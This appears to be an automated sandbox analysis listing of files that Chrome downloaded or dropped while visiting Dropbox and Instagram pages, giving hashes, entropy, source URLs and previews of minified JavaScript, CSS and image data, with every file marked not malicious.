                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="dffdaac9-8de4-3428-8d78-769a0defa77b")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function c(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(c){if("default"!==c){var n=Object.getOwnPropertyDescriptor(e,c);Object.defineProperty(t,c,n.get?n:{enumerable:!0,get:function(){return e[c]}})}})),t.default=e,Object.freeze(t)}var n=c(t);e.AdminConsoleLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M18 15.75a2.616 2.616 0 0 0-1.001.188l-1.205-1.206A4.97 4.97 0 0 0 16.5 12a4.97 4.97 0 0 0-.707-2.733L17 8.063c.318.127.658.19 1.001.187 1.387 0 2.25-.862 2.25-2.25S19.387 3.75 18 3.75s-2.25.862-2.25 2.25c-.004.343.06.683.188 1.001l-1.206 1.205A4.97 4.97 0 0 0 12 7.5a4.97
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (29607)
                                                                        Category:dropped
                                                                        Size (bytes):3570671
                                                                        Entropy (8bit):5.536656135223707
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:719D1AB7AECE7C30286BC32E699A424F
                                                                        SHA1:B5BF2E4AE837223FFC8E9C41E3C8B07688175E42
                                                                        SHA-256:190424E10394C3E2A86C71CD68980213EDE24DBC19C1B9C5489F99B7D2E23008
                                                                        SHA-512:AC940C49BBA54D55D14142D6F91E435ED99E77242C9C1B9798CBD8A761D3E03AB8E1403FB2C3F1C120A2DE380BB6657A24E12A9EBC68C2CA3C8DD59EC82C8339
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("BaseFocusRing.react",["FocusWithinHandler.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react"),j={focused:{boxShadow:"x18bame2",outline:"x1a2a7pz xvetz19",$$css:!0},focusedInset:{boxShadow:"xpud6h4",$$css:!0},unfocused:{outline:"x1a2a7pz",$$css:!0}};function a(a){var b=a.children,d=a.focusRingPosition,e=d===void 0?"default":d;d=a.mode;var f=d===void 0?"focus-visible":d;d=a.suppressFocusRing;var g=d===void 0?!1:d;d=a.testOnly;return i.jsx(c("FocusWithinHandler.react"),{testOnly:d,children:function(a,c){a=!g&&a&&(c||f==="focus");return b(a?e==="inset"?j.focusedInset:j.focused:j.unfocused)}})}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("BaseInput.react",["CometContainerPressableContext","Locale","react","stylex","testID"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j=i||(i=d("react"));b=i;var k=b.useContext,l=b.useMemo,m={root:{WebkitTapHighlightColor:"x1i10hfl",boxSizing:"x9f619",touchAction:"xggy1nq",":disabled_curso
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (4352)
                                                                        Category:dropped
                                                                        Size (bytes):21530
                                                                        Entropy (8bit):5.437194982846472
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:95C8B80048322355D47C468A413A2041
                                                                        SHA1:01F1A263B5E9ECD8A8634F5F038C8CBE4A739679
                                                                        SHA-256:20A68D37CA8C063F7B0B8C99519FF8B42998AE96F7DFC23421FE6BE8FA3F5953
                                                                        SHA-512:D946850B9B69CD736B3A834AAA08B8219FC5C92A81ADC83B57CB049B5560DB06D7BCB117DD5BCB4BA732FD2673DBAC88317945EC5EFEBED8E090FC47775BD437
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("DateStrings",["fbt"],(function(a,b,c,d,e,f,g,h){var i,j,k,l,m,n,o,p,q;function a(a){n||(n=[h._("Sunday"),h._("Monday"),h._("Tuesday"),h._("Wednesday"),h._("Thursday"),h._("Friday"),h._("Saturday")]);return n[a]}function b(a){p||(p=[h._("SUNDAY"),h._("MONDAY"),h._("TUESDAY"),h._("WEDNESDAY"),h._("THURSDAY"),h._("FRIDAY"),h._("SATURDAY")]);return p[a]}function c(a){o||(o=[h._("Sun"),h._("Mon"),h._("Tue"),h._("Wed"),h._("Thu"),h._("Fri"),h._("Sat")]);return o[a]}function d(a){q||(q=[h._("SUN"),h._("MON"),h._("TUE"),h._("WED"),h._("THU"),h._("FRI"),h._("SAT")]);return q[a]}function r(){i=[h._("January"),h._("February"),h._("March"),h._("April"),h._("May"),h._("June"),h._("July"),h._("August"),h._("September"),h._("October"),h._("November"),h._("December")]}function e(a){i||r();return i[a-1]}function f(){i||r();return i.slice()}function s(a){l||(l=[h._("JANUARY"),h._("FEBRUARY"),h._("MARCH"),h._("APRIL"),h._("MAY"),h._("JUNE"),h._("JULY"),h._("AUGUST"),h._("SEPTEMBER
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 221433
                                                                        Category:downloaded
                                                                        Size (bytes):47671
                                                                        Entropy (8bit):7.993768844907229
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:B80456C2E5703B049FD6C2E8F2C12DD7
                                                                        SHA1:E8E4D68F43DE95E026A046CDC92C25E7376FDFEE
                                                                        SHA-256:815DA46FA0D83D7A59E0E293E4B050864509717DA7909F97E51A3FB7237486B2
                                                                        SHA-512:34B89093072BEFF11D3ACC67A4D880637116B684E4AB6613EA92D0CD9C331C0D5E33EC999A434E6C5152BB0C37B891B571E9F8C1C221D29315C9456F03FCF1FB
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/paper_binder~paper_bundle~paper_cloud_docs~paper_pifs~paper_view_only_79a9c349e8a4760c374a.AGAIK3o680VoltdTkkT8quOC27N0H3FGPEssPeqZujg.js.gz
                                                                        Preview:............r.8.0._W!s......ly8Y...}..I&.M.(....6..Q......V.V...l=.H.$.....;.tuU,.xp ..z...yssz.......qtxs....OW77...._..f..c...-.C........!~$..c...I.........y.....T...........E.a..AKb.i.9T...H...5:[....b..v.......8.S."....g.M|...;.Op..=3.{...(.."...EM..F.C........L.........8p.Np4M;.Go./..>..}..hz.........H@q@.H.9.z......+^.z..5..$.6#L.6..&lR....)&I....S.......@.N.il..z.c.7........1M.|}.|.s.#..l7...i[...no..D......<+...m.EV.w{.]..V.ov.[...@.ml.n...}wc{.c .....n{.@.....n.(......7oR.$p.G.~,..b.#.9(A!.......Z.....E#Ko...@9.......C.".Qc.....6u...`K.B7...88z...G.$.*@....sPA.....bL..........w..A>e...._..q....2HG.C.'..H....q..)...B.b.f.C.vp......7.([.e...........G.....8...7w..o..n.!.........\OZLR.~._e.O.c..D..>LX.r.\.F..\<.....y...._....W...?z.>$...t..............A>z."..3.p......:.)...4p.{Emy..q..8g.W....w.c.y..+?.Z................q..8.i.....}.....-.........M...J..xr.........SpF\i.o.c....E...?..&.......G...%1...OOo>..}..x.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2527)
                                                                        Category:dropped
                                                                        Size (bytes):2919
                                                                        Entropy (8bit):5.399239176144535
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6B3EC1E5795B320EBF29B85EBD71B3B0
                                                                        SHA1:AEE04CCDD54D61DA21AB62A691D612796518FD97
                                                                        SHA-256:455E7D9624AEA39383B2F7232568802CE6C2696C2A52CE7DC526E9117B286090
                                                                        SHA-512:553399C8D678BAB5CEA5BF3722770B55A047728F8CED2711F5570237F9E86AB02AC22B9037F1710C765F355F9BF01FCF0DD89FF0D8958725B38015C7C72FB0C3
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="36425a7d-e1a9-34b1-942c-1137935ae9ae")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function l(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(l){if("default"!==l){var r=Object.getOwnPropertyDescriptor(e,l);Object.defineProperty(t,l,r.get?r:{enumerable:!0,get:function(){return e[l]}})}})),t.default=e,Object.freeze(t)}var r=l(t);e.ArrowDownLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M11.75 5v12m6.5-5.25L11.75 18l-6.5-6.25",stroke:"currentColor",strokeWidth:1.5,strokeMiterlimit:10,vectorEffect:"non-suserng-stroke"})),e.ArrowUpLine=e=>r.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},r.createElement("path",{d:"M11.75 19V7m-6.5 5.25L11.75 6l6.5
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (8497)
                                                                        Category:downloaded
                                                                        Size (bytes):8498
                                                                        Entropy (8bit):4.901767907286479
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:30EBE89ADA4569020889569E3700FD6D
                                                                        SHA1:9CC0DB62BCF4E8688461CF10903FC686375005E2
                                                                        SHA-256:9189666CBA8E7FEEE41224C2231C5BEBB265652BE0A4FFA623F7504F9F6C417F
                                                                        SHA-512:35C8BD4A8F292896A5ADB646B5446791F0B7E8BA013A3EEF8DE0ED0CB38AEE8CEDB7C5C62F324ED4EF8797E1898D0799C5AB17C229801D4D5DBE104A93CA144D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/google_one_tap-vflMOvomt.css
                                                                        Preview:#credential_picker_iframe{z-index:10002 !important}.shared-link-signup-page #credential_picker_container,.shared-link-signup-page .one-tap-tos-modal-v1{top:var(--ib-preview-toolbar-top-offset, 20px)}.file-transfers-page-body #credential_picker_container{top:calc( var(--dwg-nav__height--universal, 48px) + var(--dwg-spacing__unit--2, 16px) - 6px)}.warp-page #credential_picker_container{top:calc( var(--dwg-nav__height--universal, 48px) + var(--dwg-spacing__unit--2, 16px) - 6px)}.shared-link-file-page #credential_picker_container,.shared-link-file-page .one-tap-tos-modal-v1{top:calc(var(--titlebarHeight, 64px) + var(--dwg-spacing__unit--2, 16px) - 6px);right:calc(56px + var(--dwg-spacing__unit--2, 16px) - 6px)}.shared-link-folder-page #credential_picker_container,.shared-link-folder-page .one-tap-tos-modal-v1,.scl-folder-page #credential_picker_container,.scl-folder-page .one-tap-tos-modal-v1{top:calc(var(--titlebarHeight, 64px) + var(--dwg-spacing__unit--2, 16px) - 6px)}.login-or-register
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 18559
                                                                        Category:downloaded
                                                                        Size (bytes):4662
                                                                        Entropy (8bit):7.961689744956587
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2BC253CE0BE257FC5A5C619D6E58DBD9
                                                                        SHA1:BF50151B8E4504CECC7B08ABC80EEF09CD0AFFAB
                                                                        SHA-256:DB0497747029EEE05D1F6748658671A692BEC126D332BE7CC74F3D793E0D1F41
                                                                        SHA-512:2800CE4188807BE58885C8E5A251FE4BC0AF07532345FA41E3AF43D71BE4EAFD05CB0DD5C07F56A674FA98347DA5D6BF400578A34023F191D680020F4FDD0C82
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/paper_binder~paper_bundle~paper_cloud_docs~paper_jasmine_tests~paper_pifs~paper_view_only_48e88829d29beffab70d.hnPLc8Mc2vtcqe04NHWjl1YQ1mmWY6B6C02N70c2lTw.js.gz
                                                                        Preview:...........\.r.....x.Td....".gJ...g...rNv&.R.dKbL..........O.O.. )..dj.#E.@w.Dw.}.u....../.'.w..........o.~.^.|6.zkX..._......<.B._.1u}H.8>..}.9<........Ev/......}F..vkNw...u0.I....ry...a.0.(\E,.HLtaj.>.O.........h.FGXC..Y........>..n.+.<.x...xth?0.U[.....d6....v.......k.......a.6.Z{Go.3..~.wxh..M..]y..IG8}.])..`L..1..1..`u}.n..Z.....8!.? b........=x.j.$O..-....f..eNcc..,.4.1..6.....pF.0......M.P7,.Q..=...s....C.U$.*..2.....\.../.d...8.*..Z=....C...M".Pa}<;9.w...E..4V:...P7......D@.......o....{....&......S.Zl..y.uF.<.W....KIT.h.q....K.-.Q$...B. 5..Gz...!...ur...J.h...6.>Dl.^.....@xtx..p...{I....^."6..L)I~.....E....{p...wR..8.:..c..1g.^`..o$.~%Q....^.v........o..C.w..9J......Nb.....v*....`w'g..p1+....ve.uhXWh.....G.hb..........pN...}..{F...p.. F..............O.../,.WQ..ij6O.M>".x..N.;.1.p.s?.X0a.H...S.....eT..C..$...C.jFEE2*.Q....a..UT......r].`,.V.5...5l..M.H...].<n.h8.c...ot....`O..qp.m...g......F.1}...aA...... ....fy..l..[
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 250 x 541, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):224707
                                                                        Entropy (8bit):7.998155016922481
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:0E729FC097A960B8F6BF3135FE5D2374
                                                                        SHA1:107BF2DADB7AF1D1BFD1F3804C8F567AC369F1BE
                                                                        SHA-256:DCB2003D503EEC26E3B6BF40BCB83C6D23F6DBC8F1321A23F0277176E4473DFE
                                                                        SHA-512:223AE71196D58CEC24CE5CCD610A337B6FAF1EAB6BB031B2A235475E2576CC79CE00C60B30533DFB2820D717C260E93B81EB2212089E5FDCE6759562244EA41D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR..............2`...m.IDATx^..YhT...._U....E....A4uq@qH........L.. .`..IE..0..cUZ|r.ID}PLT.......P.QQ.BA.P..8......QkX.l.&R...^k.M...1>........^.@...T.;H/1.{..hq..... P.....c.p.\d..D....g.......j.f..Jr.......L-@...w..}..fw..\E.*...4.Q..G...h....SH...M@..A........*zZ..D.j/..U..n........".&......>NNVu....?.E...+H.0v.5....j...VJ.1>...V)#...p........@..s.z ..G....38z.(G..!..$...W.f....9r...O.>. .PM.0>/...S.2e.m...>.k.a.-....A...h..8..6L2..(**b......I..j/6...K]].---<|..K..%...!C8x. K....!.-[Fcc#555....G.:......x.g..?~..'N.G..h."..GCC...c..TUUq......y.....>|8o..k.2I$....W.^..............S__.={...c......2g..n..'O.......P(.K.....s..?A=0.xL62......D"<..\.....Q.W.X.........k........cY.~=.h.._.r..)D..]..b..........=.n.....KT..: .mE/.....7..<X>..........i.......dv.};.V.Z../~..Y...B..{.!.5j.>..{.f.....h.n......`.....j....)7n..%...Y.|9....T}.T...K.d..b..N..Bm...xC.t.....>W.\.J.!m.7n.(3..~.%.a.Ck+.......w..I.(.V.c...._..t..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 279x181, components 3
                                                                        Category:downloaded
                                                                        Size (bytes):16090
                                                                        Entropy (8bit):7.884797447999638
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:18D2EF4EB534F24BB9A06C7037477BDE
                                                                        SHA1:9794909E34C01980F69A001ACE7991F7A1CFC433
                                                                        SHA-256:417F281F3A19F96E87D82D771398C76BF4B65050331421A4267D04061B638BF2
                                                                        SHA-512:F10EFE38EB76879F9FF12DAEC7D980985F46419E6D066FDA7045CB7E5E74FD3086B2DAE690A0D79BF59178DB9AAEB9CE96B71059F33612697060A10223BD177D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://ucb77c37fdc994de353150108ec5.previews.dropboxusercontent.com/p/thumb/ACYdZ4RHikIJyf9NAKyAV6T57XQOl_oSwCVmgonrd8p6NoVv3N0T2FjNGfZCZfvhIVrnkVfBxM_Z69mKygyyekcPy3dDxtp8se-IU4zstUtB3us_QGrLCjO8WeOjEOS5JZ5RoNYDluj6DdrfEsmCorLpameAR6I2beWS_3hIEHnpMr9oIHFxEOr7aNqKpuu26jkPqwLHGgi62o2pLISRDeGcMg_fU9EFWJrdDrqJSLAs483w4FcqFb3sQFBesVgdt4y45Dj7nXz-5rHnB8TIiOSIsCfY7TZ2JB7XTypZJkYv0R2kXcIqZxHTVGwHZ5TAVZBqAIzaIVn-TVopOsC0TQip2ymQLZt7HPag-htfifu4jDPmXfF9svga_k8Y39dNfMNxMPciv3nyu_9DGqeZVsO0/p.jpeg
                                                                        Preview:......JFIF.............DICC_PROFILE......4........mntrRGB XYZ .........+.8acsp.......................................-....................................................desc.......ybkpt...x....wtpt........cprt........rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........sRGB IEC61966-2-1 black scaled..................................................................................XYZ ...........3....XYZ ...............-text....Dropbox, Inc....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............b...k...@.Q.4!.).2.;.F.Qv].kpz....|.i.~...7.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..................................................................................................
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3183)
                                                                        Category:downloaded
                                                                        Size (bytes):23143
                                                                        Entropy (8bit):5.433511249571236
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C8C94E181F414F621FA33DAB8B8A9D1E
                                                                        SHA1:1729D6A485A1B98995185B47CEDAA8366092DFAC
                                                                        SHA-256:6E836AFBDF29EB54AEB65A9E7ACCC3D184E4E8EF1FAC877AE701D23D81687179
                                                                        SHA-512:CD531CB9419F86F391B69AF418DC984B9C7A8CCC9502EE4E81754D4F7479B984BDD2F5FC23528816DD4A9BB9E9643817709895487007093696446B78B47BB6F2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/v3/y9/r/NZI83r0DPJHrxlR8c7ElLDwpjlVJlhQWSIqg5AgKB53K.js?_nc_x=Ij3Wp8lg5Kz
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("IGDOverLSMqttChannel",["CurrentUser","Env","MqttChannel","MqttEnv","MqttEnvInitializer","MqttWebConfig","Promise"],(function(a,b,c,d,e,f,g){"use strict";var h,i;c("MqttEnvInitializer").initialize();function j(a){d("MqttEnv").setIsUserLoggedInNow(c("CurrentUser").isLoggedIn);var b=c("CurrentUser").getAppID()==null?936619743392459:Number(c("CurrentUser").getAppID());return new(c("MqttChannel"))({appId:b,capabilities:c("MqttWebConfig").capabilities,chatVisibility:!0,clientCapabilities:c("MqttWebConfig").clientCapabilities,clientType:"cookie_auth",deviceId:a,endpoint:(i||(i=c("Env"))).ig_mqtt_wss_endpoint||"wss://edge-chat.instagram.com/chat",initialSubscribedTopics:c("MqttWebConfig").subscribedTopics,phpOverride:c("MqttWebConfig").hostNameOverride,pollingEndpoint:(i||(i=c("Env"))).ig_mqtt_polling_endpoint||"https://edge-chat.instagram.com/mqtt/pull",userFbid:c("CurrentUser").getPossiblyNonFacebookUserID()})}var k=null,l;function m(a){k==null&&(k=j(a));a=k;l==null?v
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):639
                                                                        Entropy (8bit):5.239448849095377
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8912435717962B83C760125A6137581C
                                                                        SHA1:BD974135B5D4FE2D736B82035AB9B838D104AB43
                                                                        SHA-256:E0892D4B06986A5574118D7EAEF9CFB7A99CB63B1B47AA04E389242E4593FB36
                                                                        SHA-512:8FD81A435610C0D35430BE756F8164C0AD8A44117CAA9DA731A03F9B7B8BD3173E30E5A25EBFADCA5B7383A50B36ACD8886F5211F5E4E12EC07FAE0BBD1FB4EC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/content-icons-vfliRJDVx.css
                                                                        Preview:/** @generated -- This file is automatically synced from @dropbox/dig-content-icons@5.2.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/...dig-ContentIcon{box-sizing:border-box}.dig-ContentIcon--overSubtle{--dig-color__fileicon__container:var(--dig-color__background__base)}.dig-ContentIcon--hasNoBackground{--dig-color__fileicon__container:transparent;--dig-color__fileicon__shadow:transparent}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 278665
                                                                        Category:dropped
                                                                        Size (bytes):60894
                                                                        Entropy (8bit):7.996053324529477
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:EF492ACD2E295314C8976246055D54C0
                                                                        SHA1:6D4AD34C5D06A40060B3B480609F40B230678E5A
                                                                        SHA-256:D089E07214EDDC9C40E913A17E4E623E9E708AFB233F9EDEC1E250299CAF02B8
                                                                        SHA-512:306B961BCACC518AB43F01539EC5E0FE529A9E642446C9AC8C9593BB75F9B6F560E0927CE863A71715063BCC659133086AB4A19C33F28DA710C068A2F8D2EC50
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:............r.(....y....a.|....p.R......no..&!.]..&!..2O......g...|.|.|........IP....~.@ ....D.`g$....o...._.9............[...7..L..}}m%8!..]..$....4.""........3Y...hJb...c...d..M...z.F..`....n.......b.;....w.......1.HiBR6...noI....Xh~..)..rg.....0...8.B.3.A.....z.....z..=l..6v........=.Q................2......=....w{[.;..=lom....4.......s...fS..........g!...M.9..y> .'....a...9..7...g..6M...;.j....y..p.|....U.x+......%8.~$.{5.i....IJ.e.......4.`..=.O.9M"...P..9f..^....,.G.m....u..xMp@.wxB2.8....|.............4.G.pf3.Q.......y9.0...SF.'.MP.0.p.D......g..e,%xb9......e..6.q@M4+....._..>i.g...S..CFR.P@b..EJ'aF...7L.3.Z.HLR.l[VN.....$.^.t.F...!.(.l.'....Z....vN. .a.`............J...M%..{.lT<..;....x^X..b.........^l..\..>f6q.w.0.[/p...o.&).<+.....{IiDpl.=D..aG.4%1;L..)..*...q......g.<..dB...$.P.O..!..[.;.8C.f..,w\F/.... ....<.7:.}:..Y..j..4.!.n..*<>..w..;.0.3F&vc.?^.].?=..SH..38jC.(K.W...[.*.?>.9..Mh...4.......(..n.8{O.........../...Q'.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (959)
                                                                        Category:downloaded
                                                                        Size (bytes):1333
                                                                        Entropy (8bit):5.412427533433124
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E3B7ED48CE0F1ECBB4661292B950EA22
                                                                        SHA1:07856B26681E9EA07A85D95A319F2CC2E31C8FAF
                                                                        SHA-256:CB6C73ADDED24C887030FD21424ECE0E189BAB58BD6C3F7DA49B16821075600F
                                                                        SHA-512:8A5A8013756A27CCE7B85A8720DA2159FB92EEE02ADA501B9DD4F29DE0235120D357F31D647540B48EE807FFF9F4EA3F049783DF574A488A314F6B121A292165
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_security_passwords-vfl47ftSM.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="bfda206a-0cb0-3668-9192-51866fd6c6cb")}catch(e){}}();.define(["exports","./c_security_csrf_hmac","./e_core_exception"],(function(r,e,o){"use strict";r.wrapPassword=async function(r,t){if(""===r)return"";const i=encodeURIComponent(r);try{const r="wrapped_password_"+(null==t?void 0:t.type)+"_";if("RSA-OAEP"===(null==t?void 0:t.type)){const o=void 0!==window.performance?window.performance.now()/1e3:0,n=t.timestamp+o,s=e.b64urldecode(t.key),p=await e.encryptWithPublicKey(s,e.stringToBytes(JSON.stringify({timestamp:n,password:i})),t.version);return r+e.b64urlencode(p)}throw new Error(`Unsupported algorithm: ${null==t?void 0:t.type}`)}catch(r){if(!0===(null==t?void 0:t.plaintextFallback))return o.reportException({err:r,severity:"non-critical",tags:["password-crypto-fallback-error"]}),
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (6586)
                                                                        Category:downloaded
                                                                        Size (bytes):13165
                                                                        Entropy (8bit):5.1932336435436
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:41DBD41EE50CD1A9BDE0AA789F061DBF
                                                                        SHA1:2E641003FD846ED11812B1A480139CF345C9C5E1
                                                                        SHA-256:1B7CB42B960F9512F0B4BB63A3AFA4F121CE77FFBE83D8935605474F21DD6ABB
                                                                        SHA-512:7967B3D32CA567DC27DED95174DDC41540F47E1E753758315F9031B0EC3FC498FA46A993985B743BB3FA18C1CA92E4E6018D030ADDF916D345656F9AE41D04D8
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/js/comments2/index-vflQdvUHu.css
                                                                        Preview:./* -- bazel-out/k8-opt/bin/node_modules/@dropbox/dig-tokens/dist/legacy-tokens.css */.:root{--color_background_backdrop:rgba(99,114,130,.5);--color_border_dark:#c6c9cd;--color_border_highlight:#ccd9fa;--color_border_light:#dddfe1;--color_brand_banana:#ffd830;--color_brand_black_cherry:#61082b;--color_brand_candy_apple:#d5001f;--color_brand_canopy:#005744;--color_brand_celadon:#a2d39b;--color_brand_cloud:#b4d0e7;--color_brand_dbx_blue:#0061ff;--color_brand_orchid:#ceb4ff;--color_brand_panda_black:#000;--color_brand_panda_white:#fff;--color_brand_pink_library:#ffafa2;--color_brand_rococo_gold:#ad780d;--color_brand_sand:#d8bea2;--color_brand_sapphire:#0d2481;--color_brand_stone:#d0d0d3;--color_brand_sunset:#fb570d;--color_brand_ultraviolet:#813bf6;--color_brand_wheat:#ffcb95;--color_dbx_blue_100:#0061ff;--color_dbx_blue_110:#0052d9;--color_dbx_blue_120:#0046ba;--color_dropshadow:rgba(99,114,130,.16);--color_focus_outline:#a6bdeb;--color_ink_100:#1d2737;--color_ink_15:#dddfe1;--color_ink_
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (21258)
                                                                        Category:downloaded
                                                                        Size (bytes):754172
                                                                        Entropy (8bit):5.500206051458265
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4D4A9D13831E0E84FD26BACFECC601E7
                                                                        SHA1:E66092981938AAA1D8867FB5AECAD06F3E98D376
                                                                        SHA-256:308033FCDE16343D961F480355BCDDC48B3A9501648104289FDF194E39309210
                                                                        SHA-512:202AFA63C979E18A21FEE01828A35A6E8544205E1B051AE2D071F14A82D67899444FE3849954C0ED04384965694356AD8407ACCCAAC9144DFEBDBE1B95EFAF4B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/rsrc.php/v3iuCn4/ya/l/en_US/clcKzMWTkkO.js?_nc_x=Ij3Wp8lg5Kz
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("ActiveFocusRegionUtilsContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);c=b;g["default"]=c}),98);.__d("CometRouterDispatcherContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext();g["default"]=b}),98);.__d("CometRouterDispatcherContextFactory.react",["CometRouterDispatcherContext","react","useStable"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||(h=d("react"));b=h;var j=b.useContext,k=b.useInsertionEffect,l=b.useMemo,m=b.useRef;function n(a){var b=a.actorID,d=a.children,e=a.from,f=a.parentDispatcher,g=a.tracePolicy,h=a.url,j=l(function(){var a={actorID:b,from:e,tracePolicy:g,url:h};return f.withContext(a)},[b,f,e,g,h]),n=m(j);k(function(){n.current=j},[j]);a=c("useStable")(function(){return{componentHistoryState:{popState:function(){var a;for(var b=arguments.length,c=new Array(b),d=0;d<b;d++)c[d]=arguments[d];return(a=n.current.componentHistoryState)==null?void 0:
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (12925)
                                                                        Category:downloaded
                                                                        Size (bytes):13295
                                                                        Entropy (8bit):5.411698739584601
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:B2E0887B5E8E181608082991AEB42000
                                                                        SHA1:0F6BE0E6FB5490905FB1236DD29EFFB5E0CE4479
                                                                        SHA-256:9EF0E151AC8CE77E9CA38ECA70776EBAF8767881917277B1F7FDB4847DB572C1
                                                                        SHA-512:D2AAE2647FF19F60F712677898B4FE28F594CC933D88657B8B65ECD8BDAFA56363BAECA150C333CB36DDAB45EFAFCA690F66216738D59DA38F9770570E77C394
                                                                        Malicious:false
                                                                        Reputation:unknown
